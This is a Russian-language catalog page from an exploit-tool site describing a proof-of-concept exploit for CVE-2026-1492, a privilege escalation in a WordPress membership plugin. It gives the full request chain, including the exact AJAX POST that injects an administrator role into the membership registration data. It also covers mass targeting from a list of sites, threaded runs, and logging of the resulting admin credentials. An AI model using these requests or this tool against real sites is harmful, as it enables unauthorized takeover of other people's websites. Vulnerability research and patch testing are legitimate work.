Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1492 — User Registration & Membership <= 5.1.2 - Неаутентифицированное повышение привилегий через регистрацию членства | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-1492
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubnxploited/cve-2026-1492

CVE-2026-1492

User Registration & Membership <= 5.1.2 - Неаутентифицированное повышение привилегий через регистрацию членства

Репозиторий
75 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1492

User Registration & Membership <= 5.1.2 — неаутентифицированное повышение привилегий через регистрацию членства

Печатающий SVG


🔴 Обзор уязвимости

CVE-2026-1492 — неаутентифицированное повышение привилегий через регистрацию членства

ПолеОписание
CVE IDCVE-2026-1492
КритичностьКритическая — оценка CVSS v3.1: 9.8
ВекторCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
Затронутое ПОUser Registration & Membership — плагин для WordPress: конструктор пользовательских форм регистрации, пользовательская форма входа, профиль пользователя, ограничение контента и управление членством
Затронутые версииВсе версии вплоть до 5.1.2 включительно
Тип уязвимостиНекорректное управление привилегиями — неаутентифицированное создание учётной записи администратора
Требуемая аутентификацияОтсутствует
CWECWE-269: Некорректное управление привилегиями

Описание:
Плагин User Registration & Membership для WordPress уязвим к неаутентифицированному повышению привилегий во всех версиях вплоть до 5.1.2 включительно. Уязвимость связана с тем, что AJAX-обработчик user_registration_membership_register_member принимает передаваемое пользователем значение role в процессе регистрации членства без применения на стороне сервера разрешённого списка значений (allowlist) и без проверки прав. Полностью неаутентифицированный удалённый злоумышленник может выстроить многошаговую цепочку AJAX-запросов — сначала зарегистрировать новую учётную запись, затем отправить вредоносный вызов register_member со значением "role": "administrator", внедрённым в JSON-полезную нагрузку members_data, — чтобы незаметно создать полностью привилегированную учётную запись Administrator в WordPress. Это приводит к полной компрометации затронутой установки WordPress без какого-либо взаимодействия с пользователем.


🛠️ Описание инструмента

Это PoC-эксплойт (Proof-of-Concept), реализующий полную атакующую цепочку с учётом состояния против сайтов на WordPress, на которых установлена уязвимая версия плагина User Registration & Membership. Инструмент выполняет интеллектуальную многоэтапную эксплуатацию с автоматическим обнаружением, извлечением планов членства, сбором nonce, регистрацией по двум сценариям, инъекцией роли и проверкой прав администратора.

🔗 Полная цепочка атаки

[Discovery Phase]
  GET /membership-pricing/  →  Extract membership plan IDs
  GET /registration/        →  Extract form fields, nonces, AJAX params

        ↓

[Registration Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_user_form_submit
  → Register new user account

        ↓

[Role Injection Phase — Flow A]
  POST /wp-admin/admin-ajax.php
  action=user_registration_membership_register_member
  members_data={"role":"administrator", "membership":"<id>", ...}
  → Inject administrator role into newly created account

        ↓

[Admin Verification Phase]
  GET /wp-admin/  →  Check for admin dashboard indicators
  GET /wp-admin/plugin-install.php  →  Confirm plugin-install access

        ↓

[Fallback Override — Flow B]
  If Flow A admin check fails → repeat with fresh username/email

        ↓

[Write to Nx_admin.txt]
  Format: https://target.com/wp-login.php user:<u> pass:<p>

📋 Требования

Системные требования

  • Python 3.8 или выше
  • Linux / Windows / macOS

Зависимости Python

pip install requests urllib3 rich

Или через файл requirements:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 Установка

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1492.git
cd CVE-2026-1492

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-1492.py

⚙️ Использование

Базовый запуск

python3 CVE-2026-1492.py

Инструмент использует полностью интерактивный терминальный интерфейс на базе Rich. Все параметры запрашиваются во время выполнения.


🗂️ Формат списка целей

Создайте обычный текстовый файл (по умолчанию: list.txt) с одной целью на строку:

https://target1.com
https://target2.com
http://target3.com/wordpress

🖥️ Интерактивные подсказки

Targets file [list.txt]: list.txt

Credentials:
  - Username prefix: random number is added per site (fresh user per target/plan/flow)
  - Email: if left empty, it will be built from the username automatically
  - Password: fixed for all sites

Username prefix (optional): Nxploited
Email (optional): 
Password [Nx_12999]: Nx_12999
Threads [3]: 5
HTTP timeout (seconds) [10]: 10

🔬 Детальный разбор эксплуатации

Шаг 1 — Обнаружение

Инструмент автоматически обнаруживает и разбирает:

ЦельЧто извлекается
/membership-pricing/ID планов членства, ссылки на страницу регистрации
/registration/Поля формы, nonce, AJAX-URL, radio-переключатели членства
JS-объект user_registration_paramsajax_url, nonce security, метаданные формы
ur_membership_frontend_localized_dataотдельный nonce для членства, AJAX-конечная точка

Шаг 2 — AJAX-регистрация

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_user_form_submit
&form_data=[{"field_name":"user_login","value":"Nxploited_A_482910",...}]
&form_id=1
&ur_frontend_form_nonce=<extracted_nonce>
&security=<extracted_security>
&is_membership_active=<membership_id>

Шаг 3 — AJAX-инъекция роли (уязвимый вызов)

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

action=user_registration_membership_register_member
&members_data={"membership":"<id>","payment_method":"free","role":"administrator","username":"Nxploited_A_482910",...}
&form_response={...}
&_wpnonce=<membership_nonce>
&security=<membership_nonce>

⚠️ Сервер принимает поле role от клиента без проверки по разрешённому списку значений — это первопричина CVE-2026-1492.

Шаг 4 — Проверка прав администратора

Инструмент открывает новую сессию, входит под только что созданными учётными данными и проверяет:

Конечная точкаПроверяемый индикатор
/wp-admin/adminmenu, wp-admin-bar, manage_options
/wp-admin/users.phpusers.php
/wp-admin/plugin-install.phpupload-plugin, plugin-install-tab

📁 Выходные файлы

Скачать инструмент